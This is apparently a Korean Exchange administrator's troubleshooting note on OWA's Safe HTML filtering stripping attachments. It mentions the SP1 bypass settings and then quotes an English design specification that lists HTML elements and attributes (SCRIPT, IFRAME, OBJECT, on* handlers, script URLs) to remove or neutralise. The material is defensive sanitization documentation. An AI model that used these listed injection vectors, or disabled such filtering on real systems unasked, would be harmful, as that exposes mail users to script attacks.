OWA에서는 html 첨부시일부태그와스크립트가제거됨. 예를들면금융기관에서보내는보안명세서등의첨부를열지못하거나, 본문이미지에링크를삽입해보내는경우링크가동작하지않는다.
▣ 원인
Exchange의 Safe HTML 기능으로인해위험성이있는태그와스크립트가제거됨.
▒ 해결 방법
Exchange 2010 SP1에서 Safe HTML Filtering은 아래와 같이 파워셸에서제어가가능하도록변경된다.
Safe HTML Filtering
Safe HTML filtering feature in previous Exchange versions can strip off certain email attachments upon download in OWA. We can avoid this by editing the web.config to include BypassOwaHTMLAttachmentFiltering and BypassOwaXmlAttachmentFiltering. Service Pack 1 has moved the settings to the OWA virtual directory, as well as OWA Mailbox Policy. The default value is False. As long as the attachment type is in the Force Save list, there will be no Safe HTML filtering applied on download.
Building a filtering mechanism on existing infrastructure When the Web Client requests the body of an object stored in Exchange, it does so by calling EcGetContentFileOp on the OURL interface. The IMail engine then performs an HTML-HTML conversion: potentially changing HTML language encoding and parsing and modifying some of the HTML according to previously specified requirements. An example of existing modification is the conversion of Content-ID references to other MIME parts in messages denoted by SRC and HREF elements to links to body parts accessible via the OURL interface (e.g. conversion of an embedded image in MHTML, src=”cid:699281317@04061999-23a8” to src=”./embedded-image1.gif”.)
The following sections outline security enhancements required to be added in the HTML-HTML conversion process.
HTML Filtering
The tables in the two sections below contain a comprehensive list of HTML elements and attributes that require modification to close security holes. The “Causes” column indicates:
Script: That the item may cause harmful script to execute;
Applet: That the item may cause harmful Java applets or ActiveX controls to execute;
UI: That the item may cause user interface corruption
Modifying Elements
Many HTML elements may, individually or when combined, cause script and applets to execute, as well as potentially corrupting the OWA user interface.
Note: Many items, such as BASE, PARAM, and META appear within elements that should already be stripped from the HTML body of the message. It may thus be unnecessary to remove these from the body of messages
Elements to filter
Element
Action
Causes
Reason
HEAD
Remove element, along with all contents to end of element
Script
Defines scripts, sounds, styles that may override rendering of form.
HTML
Remove element
UI
May corrupt rendering of form.
BODY
Remove element
UI
May corrupt rendering of form.
PLAINTEXT
Convert to PRE
UI
“Deprecated” by Netscape, “not recommended” by IE group; HTML 4-level browsers don’t properly support this element. Safe to convert element to PRE.
SCRIPT
Convert to COMMENT. Insert “<!—“ after SCRIPT tag; Netscape doesn’t support COMMENTs
Script
Allows JScript, JavaScript, VBScript to execute, with potential do any kind of damage, since the code is executing from the context of a HTML document retrieve from the context of a “safe” web server.
BASE
Remove element
UI
Sets base URL to document, against which other relative links are retrieved. Also, BASE may set the target frame of other links on the same page.
Generally appears within HEAD element.
META
Remove element
UI
Used to refresh, redirect, override stylesheets etc., thus corrupting UI.
Generally appears within HEAD element.
IFRAME
Remove element
Script, Applet, UI
Allows linking of other pages that may reside in safe or unsafe locations that may contain harmful script or controls, and confuse user by redirecting UI elements.
FRAME, FRAMESET
Remove element
Script, Applet, UI
Allows linking of other pages that may reside in safe or unsafe locations that may contain harmful script or controls.
OBJECT
Remove element
Applet
Allows ActiveX and COM objects to be linked into and execute from the context of an HTML document retrieved from the context of a “safe” web server.
PARAM
Remove element
Applet
Valid within APPLET, EMBED and OBJECT elements
APPLET
Remove element
Applet
Allows Java applet to be linked into and execute from the context of an HTML document retrieved from the context of a “safe” web server.
EMBED
Remove element
Applet
Same as above
EVENT
Convert to COMMENT. Insert “<!—“ after SCRIPT tag; Netscape doesn’t support COMMENTs
Applet
Registers an script event to executed
ILAYER
Remove element
UI
Navigator-specific. May cause UI redirection/corruption.
LAYER
Remove element
UI
Navigator-specific. May cause UI redirection/corruption.
LINK
Remove element
Script, Applet, UI
Allows for linking of CSS behaviours in IE5 (including predefined Web Client behaviours,) perform actions such as PROPPATCH or MOVE based on the styles and other attributes defined in the HTML document.
Filtering Attributes
Several attributes may contain values that allow for script execution or frame redirection (causing corruption of the user interface.)
Attribute modification
Attribute
Action
Causes
Reason
on*
Attributes begging with ”on*” should be renamed to “Xon*”
E.g. onFocus is converted to XonFocus
Applet
on* attributes may be interspersed throughout HTML markup to add JavaScript event logic that is be harmful, once the event is fired.
ACTION, SRC, HREF
Attributes beginning with “JavaScript”, “VBScript”, “JScript”, “LiveScript”, “PerlScript” should be set to blank (“”)
Applet
Script may be placed an attribute value to (Script) execute script when clicking a link or (Applet) loading an item, (UI) override the result of the message form.
METHOD
Methods converted to “GET”
Applet, UI
May be used to override Web Client form submission, allowing message data to be transmitted to an outside source
TARGET
Value converted to TARGET=”_BLANK”, unless HREF starts with a “#” (indicating local anchor)
UI
Invalid targets may be made to change or simulate the Web Client user interface or navigate the user to other sites. Explicitly setting the TARGET will cause links to be opened in a new browser window.